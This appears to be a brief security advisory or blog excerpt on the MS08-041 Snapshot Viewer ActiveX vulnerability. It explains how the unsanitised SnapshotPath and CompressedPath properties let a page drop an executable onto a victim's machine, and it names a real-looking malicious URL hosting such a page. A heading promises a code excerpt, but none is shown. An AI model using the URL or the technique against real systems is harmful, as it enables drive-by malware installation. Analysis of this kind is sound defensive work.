|
References:
1) Microsoft Security Bulletin MS08-041 - Critical Vulnerability in the ActiveX Control for the Snapshot Viewer 2) Microsoft Snapshot Viewer ActiveX Control Arbitrary File Upload Vulnerability Technical Information The vulnerability is due to an error in the Snapshot ActiveX control (snapview.ocx) when processing the certain string values. The ActiveX control fails to properly sanitize user-supplied input entered to the SnapshotPath and CompressedPath properties. An attacker can use the SnapshotPath property to specify a file and the CompressedPath property to place a file in a known location. 3) More SQL Injections - very active right now The office.htm file exploits the Snapshot Viewer vulnerability. http://www.plgou.com/csrss/office.htm Code Excerpt 
Once the activeX object has been set the script uses the CompressedPath property string to download the non-whitelisted wsv.exe file to the Program Files directory unless protection intervenes: 
|
